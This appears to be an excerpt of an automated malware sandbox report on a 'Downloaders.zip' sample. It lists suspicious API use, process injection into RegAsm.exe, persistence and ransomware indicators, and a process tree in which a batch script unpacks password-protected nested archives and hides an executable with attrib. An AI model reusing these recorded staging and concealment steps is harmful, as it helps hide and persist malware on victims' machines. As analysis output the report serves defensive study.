Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
N/A N/A C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
N/A N/A C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Identification-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\onetap.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\wow.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\yiklfON.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe N/A
N/A N/A C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe N/A
N/A N/A C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\seksiak.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\seksiak.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pp.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\twztl.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pornhub_downloader.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1487223240.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4288 wrote to memory of 2536 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\surfex.exe
PID 4288 wrote to memory of 2536 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\surfex.exe
PID 4288 wrote to memory of 2536 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\surfex.exe
PID 2536 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4504 wrote to memory of 1540 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
PID 4504 wrote to memory of 1540 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
PID 4504 wrote to memory of 1540 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
PID 4504 wrote to memory of 4664 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
PID 4504 wrote to memory of 4664 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
PID 1540 wrote to memory of 2856 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe C:\Windows\system32\cmd.exe
PID 1540 wrote to memory of 2856 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe C:\Windows\system32\cmd.exe
PID 2856 wrote to memory of 1120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2856 wrote to memory of 1120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2856 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2856 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2856 wrote to memory of 4304 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 2856 wrote to memory of 4304 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 4304 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4304 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4304 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1696 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 1696 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"

C:\Users\Admin\Desktop\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463.exe"

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

